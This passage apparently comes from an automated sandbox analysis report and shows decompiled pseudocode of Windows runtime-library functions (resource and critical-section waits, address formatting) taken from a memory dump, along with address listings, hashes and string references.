                                                                                                                                                        0x00942349
                                                                                                                                                        0x0094234d
                                                                                                                                                        0x00942251
                                                                                                                                                        0x00942251
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942251
                                                                                                                                                        0x009421a4
                                                                                                                                                        0x009421a4
                                                                                                                                                        0x009421a6
                                                                                                                                                        0x009421a8
                                                                                                                                                        0x009421ac
                                                                                                                                                        0x009421b6
                                                                                                                                                        0x009421b8
                                                                                                                                                        0x009421bc
                                                                                                                                                        0x009421be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009421c0
                                                                                                                                                        0x009421c2
                                                                                                                                                        0x009421c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009421c4
                                                                                                                                                        0x009421c6
                                                                                                                                                        0x009421c6
                                                                                                                                                        0x009421c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009421c8
                                                                                                                                                        0x009421a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942183
                                                                                                                                                        0x0092057b
                                                                                                                                                        0x0092057d
                                                                                                                                                        0x00920581
                                                                                                                                                        0x00920583
                                                                                                                                                        0x00942178
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920589
                                                                                                                                                        0x0092058f
                                                                                                                                                        0x0092058f
                                                                                                                                                        0x00920583
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00942206
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                        • Opcode ID: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                                                                                                                                                        • Instruction ID: 793d0a2ddc17d124f23479943d463c3082c7fe029ffe019ac97662dd03e1cd72
                                                                                                                                                        • Opcode Fuzzy Hash: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                                                                                                                                                        • Instruction Fuzzy Hash: 91513831B442116FEB14DF19DC81FA633AEBFD8720F218229FD59DB286D965EC418B90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 009214C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E009214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9c2088; // 0x77777575
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00917707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009213CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00917707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00917707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008E2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E008EE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                        0x009214c0
                                                                                                                                                        0x009214cb
                                                                                                                                                        0x009214d2
                                                                                                                                                        0x009214d6
                                                                                                                                                        0x009214da
                                                                                                                                                        0x009214de
                                                                                                                                                        0x009214e3
                                                                                                                                                        0x0092157a
                                                                                                                                                        0x0092157a
                                                                                                                                                        0x009214f1
                                                                                                                                                        0x009214f3
                                                                                                                                                        0x0094ea0f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094ea15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094ea15
                                                                                                                                                        0x009214f9
                                                                                                                                                        0x009214f9
                                                                                                                                                        0x009214fe
                                                                                                                                                        0x00921504
                                                                                                                                                        0x0094ea1a
                                                                                                                                                        0x0094ea1f
                                                                                                                                                        0x0094ea21
                                                                                                                                                        0x0094ea22
                                                                                                                                                        0x0094ea27
                                                                                                                                                        0x0094ea2a
                                                                                                                                                        0x0094ea2a
                                                                                                                                                        0x00921515
                                                                                                                                                        0x00921517
                                                                                                                                                        0x0092156d
                                                                                                                                                        0x00921572
                                                                                                                                                        0x00921575
                                                                                                                                                        0x00921575
                                                                                                                                                        0x0092151e
                                                                                                                                                        0x0094ea50
                                                                                                                                                        0x0094ea55
                                                                                                                                                        0x0094ea58
                                                                                                                                                        0x0094ea58
                                                                                                                                                        0x0092152e
                                                                                                                                                        0x00921531
                                                                                                                                                        0x00921533
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00921535
                                                                                                                                                        0x00921541
                                                                                                                                                        0x00921549
                                                                                                                                                        0x00921549
                                                                                                                                                        0x00921533
                                                                                                                                                        0x009214f3
                                                                                                                                                        0x00921559

                                                                                                                                                        APIs
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0094EA22
                                                                                                                                                          • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 0092146B
                                                                                                                                                          • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 00921490
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0092156D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u$uuww
                                                                                                                                                        • API String ID: 48624451-3129179589
                                                                                                                                                        • Opcode ID: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                                                                                                                                                        • Instruction ID: b86a9c3584357acc35dd5c5c0693380c57c963b60c5937a2bbfa751d57c5921c
                                                                                                                                                        • Opcode Fuzzy Hash: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                                                                                                                                                        • Instruction Fuzzy Hash: A621C372A002299BCF21DE58DC41EEAB3BCFBA0700F444551FC46D3245DB749A698BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 009053A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E009053A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009c01c0;
									_push(_t92);
									_push(0);
									_t37 = E008DF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00924FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00933F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0096217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00933F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00923915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00905384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E008DF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00923915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E008DF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00923915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E008DF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00923915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00905329(_t74, _t92);
													_push(1);
													_t48 = E009053A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                        0x009053ab
                                                                                                                                                        0x009053ae
                                                                                                                                                        0x009053b1
                                                                                                                                                        0x009053b4
                                                                                                                                                        0x009053b7
                                                                                                                                                        0x009205b6
                                                                                                                                                        0x009205c0
                                                                                                                                                        0x009205c3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009205c9
                                                                                                                                                        0x009205c9
                                                                                                                                                        0x009205cc
                                                                                                                                                        0x009205d5
                                                                                                                                                        0x009205d5
                                                                                                                                                        0x009053bd
                                                                                                                                                        0x009053bd
                                                                                                                                                        0x009053bd
                                                                                                                                                        0x009053be
                                                                                                                                                        0x009053be
                                                                                                                                                        0x009053be
                                                                                                                                                        0x009053c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942269
                                                                                                                                                        0x0094226d
                                                                                                                                                        0x00942349
                                                                                                                                                        0x0094234d
                                                                                                                                                        0x00942273
                                                                                                                                                        0x00942276
                                                                                                                                                        0x00942279
                                                                                                                                                        0x0094227e
                                                                                                                                                        0x00942283
                                                                                                                                                        0x00942287
                                                                                                                                                        0x0094228a
                                                                                                                                                        0x0094228d
                                                                                                                                                        0x0094228f
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422be
                                                                                                                                                        0x009422c4
                                                                                                                                                        0x009422cc
                                                                                                                                                        0x009422d0
                                                                                                                                                        0x009422d6
                                                                                                                                                        0x009422d7
                                                                                                                                                        0x009422da
                                                                                                                                                        0x009422df
                                                                                                                                                        0x009422e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422e6
                                                                                                                                                        0x009422e9
                                                                                                                                                        0x009422f4
                                                                                                                                                        0x009422f9
                                                                                                                                                        0x009422fa
                                                                                                                                                        0x00942305
                                                                                                                                                        0x00942314
                                                                                                                                                        0x00942319
                                                                                                                                                        0x0094231a
                                                                                                                                                        0x0094231d
                                                                                                                                                        0x00942320
                                                                                                                                                        0x00942323
                                                                                                                                                        0x00942323
                                                                                                                                                        0x00942328
                                                                                                                                                        0x0094232d
                                                                                                                                                        0x0094232f
                                                                                                                                                        0x00942331
                                                                                                                                                        0x00942336
                                                                                                                                                        0x00942336
                                                                                                                                                        0x0094233b
                                                                                                                                                        0x0094233d
                                                                                                                                                        0x00942350
                                                                                                                                                        0x00942351
                                                                                                                                                        0x00942356
                                                                                                                                                        0x00942359
                                                                                                                                                        0x00942359
                                                                                                                                                        0x0094235b
                                                                                                                                                        0x0094235d
                                                                                                                                                        0x00905367
                                                                                                                                                        0x0090536b
                                                                                                                                                        0x00905372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942363
                                                                                                                                                        0x00942363
                                                                                                                                                        0x00942369
                                                                                                                                                        0x0094236a
                                                                                                                                                        0x0094236c
                                                                                                                                                        0x00942371
                                                                                                                                                        0x00942373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942379
                                                                                                                                                        0x00942379
                                                                                                                                                        0x0094237a
                                                                                                                                                        0x0094237f
                                                                                                                                                        0x0094237f
                                                                                                                                                        0x00942385
                                                                                                                                                        0x00942386
                                                                                                                                                        0x00942389
                                                                                                                                                        0x0094238e
                                                                                                                                                        0x00942390
                                                                                                                                                        0x00905378
                                                                                                                                                        0x0090537c
                                                                                                                                                        0x00942396
                                                                                                                                                        0x00942396
                                                                                                                                                        0x00942397
                                                                                                                                                        0x0094239c
                                                                                                                                                        0x009423a2
                                                                                                                                                        0x009423a3
                                                                                                                                                        0x009423a6
                                                                                                                                                        0x009423ab
                                                                                                                                                        0x009423ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009423b3
                                                                                                                                                        0x009423b3
                                                                                                                                                        0x009423b4
                                                                                                                                                        0x009423b9
                                                                                                                                                        0x009423ba
                                                                                                                                                        0x009423ba
                                                                                                                                                        0x009423bc
                                                                                                                                                        0x009423bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939153
                                                                                                                                                        0x00939158
                                                                                                                                                        0x0093915a
                                                                                                                                                        0x0093915e
                                                                                                                                                        0x00939160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939166
                                                                                                                                                        0x00939166
                                                                                                                                                        0x00939171
                                                                                                                                                        0x00939176
                                                                                                                                                        0x00939176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939160
                                                                                                                                                        0x009423c6
                                                                                                                                                        0x009423cb
                                                                                                                                                        0x009423ce
                                                                                                                                                        0x009423d7
                                                                                                                                                        0x009423d7
                                                                                                                                                        0x009423ad
                                                                                                                                                        0x00942390
                                                                                                                                                        0x00942373
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x00942291
                                                                                                                                                        0x00942291
                                                                                                                                                        0x00942293
                                                                                                                                                        0x00942295
                                                                                                                                                        0x0094229a
                                                                                                                                                        0x009422a1
                                                                                                                                                        0x009422a3
                                                                                                                                                        0x009422a7
                                                                                                                                                        0x009422a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422ab
                                                                                                                                                        0x009422ad
                                                                                                                                                        0x009422af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422af
                                                                                                                                                        0x009422b1
                                                                                                                                                        0x009422b4
                                                                                                                                                        0x009422b4
                                                                                                                                                        0x009422b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422b6
                                                                                                                                                        0x0094228f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094226d
                                                                                                                                                        0x009053cb
                                                                                                                                                        0x009053ce
                                                                                                                                                        0x009053d0
                                                                                                                                                        0x009053d4
                                                                                                                                                        0x009053d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009053d8
                                                                                                                                                        0x009053e3
                                                                                                                                                        0x009053ea
                                                                                                                                                        0x009053ea
                                                                                                                                                        0x009053d6
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009422F4
                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009422FC
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 00942328
                                                                                                                                                        • RTL: Resource at %p, xrefs: 0094230B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-871070163
                                                                                                                                                        • Opcode ID: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
                                                                                                                                                        • Instruction ID: 981150c3536c3a050b69dd4708f98fb73769ec028dfe72511bbc16febd22fefc
                                                                                                                                                        • Opcode Fuzzy Hash: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
                                                                                                                                                        • Instruction Fuzzy Hash: B8512671600711ABEB149F28CC81FA773ACFF94760F114229FD18DB281EAA5ED418BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0090EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E0090EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E008FDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x9c793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008E16C0(_t39);
				} else {
					_t40 = E008DF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00923915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008E01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x9c793c; // 0x0
								_push(_t85);
								_t44 = E008E1F28(_t71);
							} else {
								_t44 = E008DF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00923915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00962306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0090EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00924FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00933F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00933F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9c20c0;
								if(_t85 != 0x9c20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0096217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00933F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                        0x0090ec56
                                                                                                                                                        0x0090ec56
                                                                                                                                                        0x0090ec56
                                                                                                                                                        0x0090ec5c
                                                                                                                                                        0x0090ec64
                                                                                                                                                        0x009423e6
                                                                                                                                                        0x009423eb
                                                                                                                                                        0x009423eb
                                                                                                                                                        0x0090ec6a
                                                                                                                                                        0x0090ec6c
                                                                                                                                                        0x0090ec6f
                                                                                                                                                        0x009423f3
                                                                                                                                                        0x009423f8
                                                                                                                                                        0x009423fa
                                                                                                                                                        0x009423fc
                                                                                                                                                        0x0090ec75
                                                                                                                                                        0x0090ec76
                                                                                                                                                        0x0090ec76
                                                                                                                                                        0x0090ec7b
                                                                                                                                                        0x0090ec7c
                                                                                                                                                        0x0090ec7e
                                                                                                                                                        0x00942406
                                                                                                                                                        0x00942407
                                                                                                                                                        0x0094240c
                                                                                                                                                        0x0094240d
                                                                                                                                                        0x0094240d
                                                                                                                                                        0x0094240d
                                                                                                                                                        0x00942414
                                                                                                                                                        0x00942417
                                                                                                                                                        0x0094241e
                                                                                                                                                        0x00942435
                                                                                                                                                        0x00942438
                                                                                                                                                        0x0094243c
                                                                                                                                                        0x0094243f
                                                                                                                                                        0x00942442
                                                                                                                                                        0x00942443
                                                                                                                                                        0x00942446
